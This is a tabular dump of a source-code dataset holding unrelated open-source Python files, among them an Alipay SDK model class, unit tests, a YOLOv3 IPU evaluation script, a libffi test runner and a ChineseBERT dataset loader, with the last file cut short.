max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
alipay/aop/api/domain/QuotaGradientRule.py | antopen/alipay-sdk-python-all | 213 | 12769620 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
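# Minimal usage sketch (hypothetical values, not from the SDK docs): set the
# quota for one score tier and serialize the rule for an OpenAPI request.
#
#     rule = QuotaGradientRule()
#     rule.score_600 = 5000
#     rule.to_alipay_dict()   # -> {'score_600': 5000}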
class QuotaGradientRule(object):
def __init__(self):
self._score_400 = None
self._score_450 = None
self._score_500 = None
self._score_550 = None
self._score_600 = None
self._score_650 = None
self._score_700 = None
self._score_750 = None
self._score_800 = None
self._score_850 = None
self._score_900 = None
self._score_950 = None
@property
def score_400(self):
return self._score_400
@score_400.setter
def score_400(self, value):
self._score_400 = value
@property
def score_450(self):
return self._score_450
@score_450.setter
def score_450(self, value):
self._score_450 = value
@property
def score_500(self):
return self._score_500
@score_500.setter
def score_500(self, value):
self._score_500 = value
@property
def score_550(self):
return self._score_550
@score_550.setter
def score_550(self, value):
self._score_550 = value
@property
def score_600(self):
return self._score_600
@score_600.setter
def score_600(self, value):
self._score_600 = value
@property
def score_650(self):
return self._score_650
@score_650.setter
def score_650(self, value):
self._score_650 = value
@property
def score_700(self):
return self._score_700
@score_700.setter
def score_700(self, value):
self._score_700 = value
@property
def score_750(self):
return self._score_750
@score_750.setter
def score_750(self, value):
self._score_750 = value
@property
def score_800(self):
return self._score_800
@score_800.setter
def score_800(self, value):
self._score_800 = value
@property
def score_850(self):
return self._score_850
@score_850.setter
def score_850(self, value):
self._score_850 = value
@property
def score_900(self):
return self._score_900
@score_900.setter
def score_900(self, value):
self._score_900 = value
@property
def score_950(self):
return self._score_950
@score_950.setter
def score_950(self, value):
self._score_950 = value
def to_alipay_dict(self):
params = dict()
if self.score_400:
if hasattr(self.score_400, 'to_alipay_dict'):
params['score_400'] = self.score_400.to_alipay_dict()
else:
params['score_400'] = self.score_400
if self.score_450:
if hasattr(self.score_450, 'to_alipay_dict'):
params['score_450'] = self.score_450.to_alipay_dict()
else:
params['score_450'] = self.score_450
if self.score_500:
if hasattr(self.score_500, 'to_alipay_dict'):
params['score_500'] = self.score_500.to_alipay_dict()
else:
params['score_500'] = self.score_500
if self.score_550:
if hasattr(self.score_550, 'to_alipay_dict'):
params['score_550'] = self.score_550.to_alipay_dict()
else:
params['score_550'] = self.score_550
if self.score_600:
if hasattr(self.score_600, 'to_alipay_dict'):
params['score_600'] = self.score_600.to_alipay_dict()
else:
params['score_600'] = self.score_600
if self.score_650:
if hasattr(self.score_650, 'to_alipay_dict'):
params['score_650'] = self.score_650.to_alipay_dict()
else:
params['score_650'] = self.score_650
if self.score_700:
if hasattr(self.score_700, 'to_alipay_dict'):
params['score_700'] = self.score_700.to_alipay_dict()
else:
params['score_700'] = self.score_700
if self.score_750:
if hasattr(self.score_750, 'to_alipay_dict'):
params['score_750'] = self.score_750.to_alipay_dict()
else:
params['score_750'] = self.score_750
if self.score_800:
if hasattr(self.score_800, 'to_alipay_dict'):
params['score_800'] = self.score_800.to_alipay_dict()
else:
params['score_800'] = self.score_800
if self.score_850:
if hasattr(self.score_850, 'to_alipay_dict'):
params['score_850'] = self.score_850.to_alipay_dict()
else:
params['score_850'] = self.score_850
if self.score_900:
if hasattr(self.score_900, 'to_alipay_dict'):
params['score_900'] = self.score_900.to_alipay_dict()
else:
params['score_900'] = self.score_900
if self.score_950:
if hasattr(self.score_950, 'to_alipay_dict'):
params['score_950'] = self.score_950.to_alipay_dict()
else:
params['score_950'] = self.score_950
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = QuotaGradientRule()
if 'score_400' in d:
o.score_400 = d['score_400']
if 'score_450' in d:
o.score_450 = d['score_450']
if 'score_500' in d:
o.score_500 = d['score_500']
if 'score_550' in d:
o.score_550 = d['score_550']
if 'score_600' in d:
o.score_600 = d['score_600']
if 'score_650' in d:
o.score_650 = d['score_650']
if 'score_700' in d:
o.score_700 = d['score_700']
if 'score_750' in d:
o.score_750 = d['score_750']
if 'score_800' in d:
o.score_800 = d['score_800']
if 'score_850' in d:
o.score_850 = d['score_850']
if 'score_900' in d:
o.score_900 = d['score_900']
if 'score_950' in d:
o.score_950 = d['score_950']
return o
|
tacker/tests/unit/vnfm/policy_actions/respawn/test_respawn.py | takahashi-tsc/tacker | 116 | 12769672 |
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd.
# All Rights Reserved
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from unittest import mock
from tacker.common import clients
from tacker import context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
from tacker.vnfm.infra_drivers.openstack import heat_client as hc
from tacker.vnfm.policy_actions.respawn import respawn as \
policy_actions_respawn
from tacker.vnfm import vim_client
class VNFActionRespawn(testtools.TestCase):
def setUp(self):
super(VNFActionRespawn, self).setUp()
self.context = context.get_admin_context()
mock.patch('tacker.db.common_services.common_services_db_plugin.'
'CommonServicesPluginDb.create_event'
).start()
self._cos_db_plugin =\
common_services_db_plugin.CommonServicesPluginDb()
@mock.patch.object(clients.OpenstackClients, 'heat')
@mock.patch.object(hc.HeatClient, 'delete')
@mock.patch.object(vim_client.VimClient, 'get_vim')
def test_execute_action(self, mock_get_vim, mock_hc_delete, mock_heat):
action_respawn = policy_actions_respawn.VNFActionRespawn()
vnf_dict = {
'id': 'fake-id',
'status': 'fake-status',
'attributes': {
'monitoring_policy': 'fake-monitoring-policy',
'failure_count': '1',
'dead_instance_id_1': '00000000-0000-0000-0000-00000000001'},
'vim_id': 'fake-vim-id',
'vim_auth': 'fake-vim-auth',
'instance_id': '00000000-0000-0000-0000-000000000002',
'placement_attr': {
'region_name': 'fake-region-name'}}
mock_get_vim.return_value = {'vim_auth': {
'auth_url': 'http://fake-url/identity/v3'
}}
mock_hc_delete.return_value = True
plugin = mock.Mock()
plugin._mark_vnf_dead.return_value = True
plugin.create_vnf_sync.return_value = {'id': 'fake-id'}
plugin._vnf_monitor = mock.Mock()
action_respawn.execute_action(plugin, self.context, vnf_dict, None)
self._cos_db_plugin.create_event.assert_called_once_with(
self.context, res_id=vnf_dict['id'],
res_state=vnf_dict['status'],
res_type=constants.RES_TYPE_VNF,
evt_type=constants.RES_EVT_MONITOR,
tstamp=mock.ANY, details="ActionRespawnHeat invoked")
mock_get_vim.assert_called_once_with(self.context, vnf_dict['vim_id'])
plugin.create_vnf_sync.assert_called_with(self.context, vnf_dict)
plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])
|
eip96/eip_96_test_script.py | kevaundray/research | 1,351 | 12769694 | from ethereum import tester, vm
from ethereum.utils import sha3, encode_int32, safe_ord, encode_hex
from ethereum.state_transition import apply_message
s = tester.state()
c = s.contract('eip_96_blockhash_getter.se.py')
blockhash_addr = b'\x00' * 19 + b'\x10'
system_addr = b'\xff' * 19 + b'\xfe'
s.state.set_code(blockhash_addr, s.state.get_code(c))
def mk_hash_setting_message(data):
return vm.Message(sender=system_addr, to=blockhash_addr, value=0, gas=1000000, data=data)
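# Sketch of the EIP-96 flow being exercised: on every block the system address
# (0xff..fe) is expected to call the blockhash contract with the parent block's
# hash, and ordinary callers read a hash back by sending the block number as
# 32-byte calldata (the sends in the asserts further below).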
print("Setting block hashes")
for i in range(1, 1000):
s.state.block_number = i + 1
o = apply_message(s.state, mk_hash_setting_message(sha3(str(i))))
if i % 100 == 0:
print("Set %d" % i)
print("Testing reads")
s.state.block_number = 1000
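# At block 1000 the contract should serve the last 256 ancestors (744..999)
# plus older block numbers that are multiples of 256 (256, 512); anything else
# returns 32 zero bytes, which is exactly what the asserts below check.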
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(999)) == sha3(str(999))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(998)) == sha3(str(998))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(744)) == sha3(str(744))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(743)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1000)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1001)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(513)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(512)) == sha3(str(512))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(511)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(256)) == sha3(str(256))
print("Tests passed!")
print("EVM code: 0x%s" % encode_hex(s.state.get_code(blockhash_addr)))
|
applications/tensorflow/detection/yolov3/evaluate.py | payoto/graphcore_examples | 260 | 12769727 | #! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 Graphcore Ltd. All Rights Reserved.
# Copyright (c) 2019 YunYang1994 <<EMAIL>>
# License: MIT (https://opensource.org/licenses/MIT)
# This file has been modified by Graphcore Ltd.
import argparse
import json
import math
import os
import shutil
import time
import numpy as np
import core.utils as utils
import cv2
import log
import tensorflow as tf
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from ipu_utils import stages_constructor
from log import logger
from tensorflow.python import ipu
from tensorflow.python.ipu import ipu_infeed_queue, ipu_outfeed_queue, loops
class YoloTest(object):
def __init__(self, opts):
self.input_size = opts["test"]["input_size"]
self.classes = utils.read_class_names(opts["yolo"]["classes"])
self.num_classes = len(self.classes)
self.score_threshold = opts["test"]["score_threshold"]
self.iou_threshold = opts["test"]["iou_threshold"]
self.moving_avg_decay = opts["yolo"]["moving_avg_decay"]
self.annotation_path = opts["test"]["annot_path"]
self.weight_file = opts["test"]["weight_file"]
self.write_image = opts["test"]["write_image"]
self.write_image_path = opts["test"]["write_image_path"]
self.show_label = opts["test"]["show_label"]
self.batch_size = opts["test"]["batch_size"]
self.precision = tf.float16 if opts["yolo"]["precision"] == "fp16" else tf.float32
self.use_moving_avg = opts["yolo"]["use_moving_avg"]
self.repeat_count = opts["test"]["repeat_count"]
self.use_infeed_queue = opts["test"]["use_infeed_queue"]
self.predicted_file_path = opts["test"]["predicted_file_path"]
self.ground_truth_file_path = opts["test"]["ground_truth_file_path"]
self.meta_dict = {}
self.testset = Dataset("test", opts)
# Configure arguments for targeting the IPU
config = ipu.config.IPUConfig()
config.auto_select_ipus = 1
config.configure_ipu_system()
model = YOLOV3(False, opts)
# construct model
# we will put whole network on one ipu
layers = []
# build layer functions for backbone and upsample
layers.extend(model.build_backbone())
# the last layer of darknet53 is a classification layer, so the backbone has 52 conv layers
assert len(layers) == 52
layers.extend(model.build_upsample())
# there are 25 conv layers if we count upsample as a conv layer
assert len(layers) == 52+25
# the decoding layer and loss layer are always put on the last IPU
layers.append(model.decode_boxes)
# reuse stages_constructor so we don't need to pass params by hand
network_func = stages_constructor(
[layers],
["input_data", "nums"],
["pred_sbbox", "pred_mbbox", "pred_lbbox", "nums"])[0]
input_shape = (self.batch_size, self.input_size, self.input_size, 3)
self.lines, self.image_dict = self.load_data()
if self.use_infeed_queue:
# The dataset for feeding the graphs
def data_gen():
return self.data_generator()
with tf.device("cpu"):
ds = tf.data.Dataset.from_generator(data_gen,
output_types=(tf.float16, tf.int32),
output_shapes=(input_shape, (self.batch_size,))
)
ds = ds.repeat()
ds = ds.prefetch(self.repeat_count*10)
# The host side queues
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(ds)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def model_func(input_data, nums):
pred_sbbox, pred_mbbox, pred_lbbox, nums = network_func(input_data, nums)
outfeed = outfeed_queue.enqueue(
{"pred_sbbox": pred_sbbox, "pred_mbbox": pred_mbbox, "pred_lbbox": pred_lbbox, "nums": nums})
return outfeed
def my_net():
r = loops.repeat(self.repeat_count,
model_func, [], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.run_loop = ipu.ipu_compiler.compile(
my_net, inputs=[])
# The outfeed dequeue has to happen after the outfeed enqueue
self.dequeue_outfeed = outfeed_queue.dequeue()
self.sess = tf.Session(config=tf.ConfigProto())
self.sess.run(infeed_queue.initializer)
else:
# using a feed dict is simpler,
# at the cost of lower throughput
with tf.device("cpu"):
with tf.name_scope("input"):
# three channel images
self.input_data = tf.placeholder(
shape=input_shape, dtype=self.precision, name="input_data")
self.nums = tf.placeholder(
shape=(self.batch_size), dtype=tf.int32, name="nums")
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.output = ipu.ipu_compiler.compile(
network_func, [self.input_data, self.nums])
self.sess = tf.Session(
config=tf.ConfigProto())
if self.use_moving_avg:
with tf.name_scope("ema"):
ema_obj = tf.train.ExponentialMovingAverage(
self.moving_avg_decay)
self.saver = tf.train.Saver(ema_obj.variables_to_restore())
else:
self.saver = tf.train.Saver()
self.saver.restore(self.sess, self.weight_file)
def load_data(self):
with open(self.annotation_path, "r") as annotation_file:
# load all images
lines = []
for line in annotation_file:
lines.append(line)
image_dict = self.testset.load_images(dump=False)
return lines, image_dict
def data_generator(self):
"""Generate input image and write groundtruth info
"""
if os.path.exists(self.write_image_path):
shutil.rmtree(self.write_image_path)
os.mkdir(self.write_image_path)
self.ground_truth_file = open(self.ground_truth_file_path, "w")
image_datas = []
nums = []
for num, line in enumerate(self.lines):
annotation = line.strip().split()
image_path = annotation[0]
image_name = image_path.split("/")[-1]
image = self.image_dict[line.strip()]
bbox_data_gt = np.array(
[list(map(int, box.split(","))) for box in annotation[1:]])
if len(bbox_data_gt) == 0:
bboxes_gt = []
classes_gt = []
else:
bboxes_gt, classes_gt = bbox_data_gt[:,
:4], bbox_data_gt[:, 4]
num_bbox_gt = len(bboxes_gt)
# output ground-truth
self.ground_truth_file.write(str(num)+":\n")
for i in range(num_bbox_gt):
class_name = self.classes[classes_gt[i]]
xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))
bbox_mess = ",".join(
[class_name, xmin, ymin, xmax, ymax]) + "\n"
self.ground_truth_file.write(bbox_mess)
image_copy = np.copy(image)
org_h, org_w, _ = image.shape
image_data = utils.resize_image(
image_copy, [self.input_size, self.input_size])
# we don't want to pass metadata through the pipeline
# so we keep it in a dictionary
self.meta_dict[num] = [org_h, org_w, image_name, line]
image_datas.append(image_data)
nums.append(num)
if len(nums) < self.batch_size:
if num < len(self.lines) - 1:
continue
else:
# if there's not enough data to fill the last batch
# we repeat the last image to yield a full sized batch
for _ in range(len(image_datas), self.batch_size):
image_datas.append(image_datas[-1])
nums.append(nums[-1])
image_datas = np.array(image_datas).astype(np.float16)
yield (image_datas, nums)
if num < len(self.lines) - 1:
image_datas = []
nums = []
while True:
# if using infeed_queue, more batches are needed
# to pad the data and meet the required repeat_count,
# so we reuse the last batch for padding
yield (image_datas, nums)
def parse_result(self, pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums):
"""Parse and write predicted result
"""
for i in range(len(nums)):
# if a nums value repeats,
# nums[i] was duplicated only to fill the required batch size,
# so we can stop the iteration
if i > 0 and nums[i] <= nums[i-1]:
break
num = nums[i]
pred_sbbox = pred_sbbox_list[i]
pred_mbbox = pred_mbbox_list[i]
pred_lbbox = pred_lbbox_list[i]
org_h, org_w, image_name, line = self.meta_dict[num]
image_path = line.strip().split()[0]
image = self.image_dict[line.strip()]
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
np.reshape(
pred_mbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
# convert boxes from input_image coordinate to original image coordinate
bboxes = utils.postprocess_boxes(
pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
bboxes_pr = utils.nms(bboxes, self.iou_threshold)
if self.write_image:
image = utils.draw_bbox(
image, bboxes_pr, self.classes, show_label=self.show_label)
cv2.imwrite(self.write_image_path+image_name, image)
self.predict_result_file.write(str(num)+":\n")
for bbox in bboxes_pr:
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
class_name = self.classes[class_ind]
score = "%.4f" % score
xmin, ymin, xmax, ymax = list(map(str, coor))
bbox_mess = ",".join(
[class_name, score, xmin, ymin, xmax, ymax]) + "\n"
self.predict_result_file.write(bbox_mess)
def evaluate(self):
self.predict_result_file = open(self.predicted_file_path, "w")
if self.use_infeed_queue:
# using infeed queue to improve throughput
# we could use an additional thread to run dequeue_outfeed to decrease latency and further improve throughput
total_samples = len(self.lines)
interaction_samples = self.batch_size*self.repeat_count
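# each sess.run of the compiled loop consumes batch_size * repeat_count samples,
# so the number of host-side interactions is the total sample count divided by that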
total_interactions = total_samples/interaction_samples
total_interactions = math.ceil(total_interactions)
for interaction_index in range(total_interactions):
run_start = time.time()
self.sess.run(self.run_loop)
result = self.sess.run(
self.dequeue_outfeed)
run_duration = time.time()-run_start
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = result[
"pred_sbbox"], result["pred_mbbox"], result["pred_lbbox"], result["nums"]
for i in range(len(nums)):
# len(nums) == repeat_count
# there are repeat_count batches in each run
if i > 0 and nums[i][0] <= nums[i-1][0]:
# ignore repeated data
# they exist only to meet the data size required when using ipu.loops.repeat
break
self.parse_result(pred_sbbox_list[i], pred_mbbox_list[i], pred_lbbox_list[i], nums[i])
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format(
(interaction_index+1)*interaction_samples, len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size,
self.repeat_count))
else:
# if not using infeed_queue, the session returns after every batch
data_gen = self.data_generator()
interaction_samples = self.batch_size
total_interactions = math.ceil(len(self.lines)/interaction_samples)
for interaction_index in range(total_interactions):
image_datas, nums = next(data_gen)
run_start = time.time()
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = self.sess.run(
self.output,
feed_dict={
self.input_data: image_datas,
self.nums: nums
}
)
run_duration = time.time()-run_start
self.parse_result(pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums)
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format(
(interaction_index+1)*interaction_samples,
len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size))
self.ground_truth_file.close()
self.predict_result_file.close()
self.sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="evaluation in TensorFlow", add_help=False)
parser.add_argument("--config", type=str, default="config/config_800.json",
help="json config file for yolov3.")
parser.add_argument("--test_path", type=str, default="./data/dataset/voc_test.txt",
help="data path for test")
arguments = parser.parse_args()
with open(arguments.config) as f:
opts = json.load(f)
opts['test']['annot_path'] = arguments.test_path
YoloTest(opts).evaluate()
|
apps/init_before_startup.py | osroom/osroom | 579 | 12769737 |
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2020/03/14 12:44
# @Author : <NAME>
import sys
from signal import signal, SIGCHLD, SIG_IGN
from pymongo.errors import OperationFailure
from apps.configs.db_config import DB_CONFIG
from apps.core.db.config_mdb import DatabaseConfig
from apps.core.db.mongodb import MyMongo
from apps.develop_run_options import start_info_print
from apps.app import app
from apps.brand_info import start_info
def init_before_startup(is_debug, csrf_enabled):
"""
Initialize related data before startup.
:param is_debug:
:param csrf_enabled:
:return:
"""
start_info()
start_info_print("\033[1;36m osroom staring...\033[0m")
# Before the site starts, connect to the database temporarily to update collections & system config
from apps.core.utils.update_sys_data import update_mdb_collections, init_datas, \
compatible_processing
database = DatabaseConfig()
mdbs = {}
# Create local temporary database objects
for k, mdb_acc in DB_CONFIG["mongodb"].items():
mdbs[k] = MyMongo()
# Initialize twice: the first pass updates the mdb collections
# If new collections exist after the first pass, the database must be initialized again for other code to use
db_init = 2
while db_init:
try:
for name, mdb in mdbs.items():
if db_init == 1:
mdb.close()
if name not in ["sys", "user", "web"]:
msg = "[Error]: 由v1.x.x更新到v2.x.x需要请更新你的数据库配置文件apps/configs/db_config.py." \
"请参考同目录下的db_config_sample.py"
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit()
mdb.init_app(
config_prefix=name.upper(),
db_config=database.__dict__["{}_URI".format(name.upper())]
)
except OperationFailure as e:
msg = "\n[Mongodb] *{}\nMongodb validation failure, the user name, " \
"password mistake or database configuration errors.\n" \
"Tip: to open database authentication configuration".format(e)
start_info_print('\033[31m{}\033[0m'.format(msg))
sys.exit(-1)
if db_init == 2 and is_debug:
# Update the database collections
start_info_print(" * Check or update the database collection")
update_mdb_collections(mdbs=mdbs)
else:
# No collections were updated, so a second database init is unnecessary; break
break
db_init -= 1
if not is_debug:
# Update the config file
from apps.core.flask.update_config_file import update_config_file
start_info_print(" * Update and sync config.py")
r = update_config_file(mdbs=mdbs)
if not r:
start_info_print("[Error] Update profile error, check log sys_start.log")
sys.exit(-1)
else:
msgs = " * The following services need to be run in a non-debugger state.\n" \
" Including the following services:- Automatic update of Mongodb collections.\n" \
" - Automatic update of website routing rights control.\n" \
" - Automatically update and merge system configuration.\n\n"
warning_msg = "\033[03m " \
"If the program runs incorrectly because the above configuration \n" \
" is not updated, you need to remove the debugger running program \n" \
" first to implement the update. After that, you can continue to run \n" \
" the program under the debugger."
start_info_print('\033[33m{}{}\033[0m'.format(msgs, warning_msg))
# Run compatibility processing, step 1
compatible_processing(mdbs=mdbs, stage=1)
# Initialize data
init_datas(mdbs=mdbs)
for mdb in mdbs.values():
mdb.close()
# Core initialization + module loading
from apps.core.flask.module_import import module_import
from apps.init_core_module import init_core_module
from apps.configs.sys_config import MODULES
init_core_module(
app,
csrf_enabled=csrf_enabled,
is_debug=is_debug
)
module_import(MODULES)
# Run compatibility processing, step 2
from apps.app import mdbs
compatible_processing(mdbs=mdbs, stage=2)
if not is_debug:
start_info_print(
" * Signal:(SIGCHLD, SIG_IGN)."
"Prevent child processes from becoming [Defunct processes]."
"(Do not need to comment out)")
signal(SIGCHLD, SIG_IGN)
start_info_print(" * Started successfully")
else:
start_info_print(" * Debugger: Started successfully")
|
mac/pyobjc-core/libffi-src/tests/dejagnu.py | albertz/music-player | 132 | 12769762 | #!/usr/bin/python
"""
A very crude emulator of dejagnu, just enough to integrate the libffi
unittests into the pyobjc ones.
"""
import os
import re
import sys
import signal
from fnmatch import fnmatch
import unittest
from distutils.util import get_platform
gDgCommands=re.compile(r'''
(?:{\s*(dg-do)\s*run\s*({[^}]*})?\s*})
|
(?:{\s*(dg-output)\s*"([^"]*)"\s*})
''',
re.VERBOSE|re.MULTILINE)
def signame(code):
for nm in dir(signal):
if nm.startswith('SIG') and nm[3] != '_' \
and getattr(signal, nm) == code:
return nm
return code
def exitCode2Description(code):
"""
Convert the exit code as returned by os.popen().close() to a string
"""
if os.WIFEXITED(code):
return 'exited with status %s'%(os.WEXITSTATUS(code),)
elif os.WIFSIGNALED(code):
sig = os.WTERMSIG(code)
return 'crashed with signal %s [%s]'%(signame(sig), sig)
else:
return 'exit code %s'%(code,)
def platform_matches(matchstr):
# This is a hack
if sys.byteorder == 'little':
platform = 'i386-apple-darwin'
else:
platform = 'powerpc-apple-darwin'
return fnmatch(platform, matchstr)
def parseDG(fdata):
result = []
for item in gDgCommands.findall(fdata):
if item[0] == 'dg-do':
result.append(('run', item[1]))
elif item[2] == 'dg-output':
result.append(('expect', item[3].decode('string_escape')))
return result
class DgTestCase (unittest.TestCase):
def __init__(self, filename):
unittest.TestCase.__init__(self)
self.filename = filename
#archOption = "-arch ppc"
#archOption = "-arch ppc64"
#archOption = "-arch i386"
archOption = "-arch x86_64"
#archOption = ""
compileOptionsBase = "-g -DMACOSX -Iinclude -o /tmp/test.bin -lffi"
compileOptionsList = ( # HACK ALERT: Yes, there are better ways to do this, but this is easy and extremely flexible
"%s %s %s" % (compileOptionsBase, archOption, "-O0"),
"%s %s %s" % (compileOptionsBase, archOption, "-O1"),
"%s %s %s" % (compileOptionsBase, archOption, "-O2"),
"%s %s %s" % (compileOptionsBase, archOption, "-O3"),
"%s %s %s" % (compileOptionsBase, archOption, "-Os"),
"%s %s %s" % (compileOptionsBase, archOption, "-Oz"), # Note: Apple-Only, see gcc man page for details
)
def runTest(self):
script = parseDG(open(self.filename).read())
output = []
for command, data in script:
if command == 'run':
action = 'run'
action_data = data
if command == 'expect':
output.append(data)
output = ''.join(output)
output = output.replace('\\', '')
d = action_data.split()
if d and d[1] == 'target':
for item in d[2:]:
if platform_matches(item):
break
else:
# Test shouldn't be run on this platform
return
# NOTE: We're ignoring the xfail data for now, none of the
# testcases are supposed to fail on darwin.
for compileOptions in self.compileOptionsList:
self.compileTestCase(compileOptions)
data = self.runTestCase()
if output != '':
self.assertEquals(data.rstrip(), output.rstrip())
os.unlink('/tmp/test.bin')
def shortDescription(self):
fn = os.path.basename(self.filename)[:-2]
dn = os.path.basename(os.path.dirname(self.filename))
return "dejagnu.%s.%s"%(dn, fn)
def compileTestCase(self, compileOptions):
# libdir = os.path.join('build', 'temp.%s-%d.%d'%(get_platform(), sys.version_info[0], sys.version_info[1]), 'libffi-src')
# libffiobjects = self.object_files(libdir)
commandline='cc %s %s 2>&1' % (compileOptions, self.filename)
fp = os.popen(commandline)
data = fp.read()
xit = fp.close()
if xit is not None:
self.fail("Compile failed[%s]:\n%s"%(xit, data))
def runTestCase(self):
os.environ['DYLD_BIND_AT_LAUNCH'] = '1'
fp = os.popen('/tmp/test.bin', 'r')
del os.environ['DYLD_BIND_AT_LAUNCH']
data = fp.read()
xit = fp.close()
if xit is not None:
self.fail("Running failed (%s)"%(exitCode2Description(xit),))
return data
def object_files(self, basedir):
result = []
for dirpath, dirnames, filenames in os.walk(basedir):
for fn in filenames:
if fn.endswith('.o'):
result.append(os.path.join(dirpath, fn))
return result
def testSuiteForDirectory(dirname):
tests = []
for fn in os.listdir(dirname):
if not fn.endswith('.c'): continue
tst = DgTestCase(os.path.join(dirname, fn))
if alltests and tst.shortDescription() not in alltests:
continue
tests.append(tst)
return unittest.TestSuite(tests)
alltests = []
if __name__ == "__main__":
alltests = sys.argv[1:]
runner = unittest.TextTestRunner(verbosity=2)
runner.run(testSuiteForDirectory('tests/testsuite/libffi.call'))
|
datasets/spm_dataset.py | chinaliwenbo/ChineseBert | 298 | 12769783 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@file : spm_dataset.py
@author: zijun
@contact : <EMAIL>
@date : 2021/1/21 15:00
@version: 1.0
@desc : Dataset for sentence pair matching tasks
"""
from functools import partial
import torch
from torch.utils.data import DataLoader
from datasets.chinese_bert_dataset import ChineseBertDataset
from datasets.collate_functions import collate_to_max_length
class SPMDataset(ChineseBertDataset):
def get_lines(self):
with open(self.data_path, 'r') as f:
lines = f.readlines()
return lines
def __len__(self):
return len(self.lines)
def __getitem__(self, idx):
line = self.lines[idx]
third, first, second, _ = line.split('\t')
first = first.replace(" ", "")
second = second.replace(" ", "")
first_output = self.tokenizer.encode(first, add_special_tokens=False)
first_pinyin_tokens = self.convert_sentence_to_pinyin_ids(first, first_output)
second_output = self.tokenizer.encode(second, add_special_tokens=False)
second_pinyin_tokens = self.convert_sentence_to_pinyin_ids(second, second_output)
label = third
# convert sentence to id
bert_tokens = first_output.ids + [102] + second_output.ids
pinyin_tokens = first_pinyin_tokens + [[0] * 8] + second_pinyin_tokens
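# each token position carries 8 pinyin ids; the all-zero row stands in for the
# [SEP] between the two sentences (and for the [CLS]/[SEP] added further below)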
if len(bert_tokens) > self.max_length - 2:
bert_tokens = bert_tokens[:self.max_length - 2]
pinyin_tokens = pinyin_tokens[:self.max_length - 2]
# id nums should be same
assert len(bert_tokens) <= self.max_length
assert len(bert_tokens) == len(pinyin_tokens)
# convert list to tensor
input_ids = torch.LongTensor([101] + bert_tokens + [102])
pinyin_ids = torch.LongTensor([[0] * 8] + pinyin_tokens + [[0] * 8]).view(-1)
label = torch.LongTensor([int(label)])
return input_ids, pinyin_ids, label
def unit_test():
data_path = "/data/nfsdata2/sunzijun/glyce/tasks/BQ/dev.tsv"
chinese_bert_path = "/data/nfsdata2/sunzijun/glyce/best/ChineseBERT-base"
dataset = SPMDataset(data_path=data_path, chinese_bert_path=chinese_bert_path)
dataloader = DataLoader(
dataset=dataset,
batch_size=10,
num_workers=0,
shuffle=False,
collate_fn=partial(collate_to_max_length, fill_values=[0, 0, 0])
)
for input_ids, pinyin_ids, label in dataloader:
bs, length = input_ids.shape
print(input_ids.shape)
print(pinyin_ids.reshape(bs, length, -1).shape)
print(label.view(-1).shape)
print()
if __name__ == '__main__':
unit_test()
|
coding_interviews/leetcode/easy/generate_the_string/generate_the_string.py | LeandroTk/Algorithms | 205 | 12769803 |
# https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts
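# Approach: for even n use (n - 1) 'a's plus one 'b' so both character counts are odd;
# for odd n a single run of n 'a's already has an odd count.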
def generate_the_string(n):
if n % 2 == 0:
return 'a' * (n - 1) + 'b'
return 'a' * n |
src/ebonite/ext/sqlalchemy/__init__.py | koskotG/ebonite | 270 | 12769864 | from .repository import SQLAlchemyMetaRepository
__all__ = ['SQLAlchemyMetaRepository']
|
demo_word_list_topic_model.py | shettyprithvi/scattertext | 1,823 | 12769877 | import scattertext as st
from scattertext import RankDifference
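# Overview: build a stoplisted unigram corpus from the 2012 convention speeches,
# derive topics around a hand-picked seed-term list using RankDifference, then
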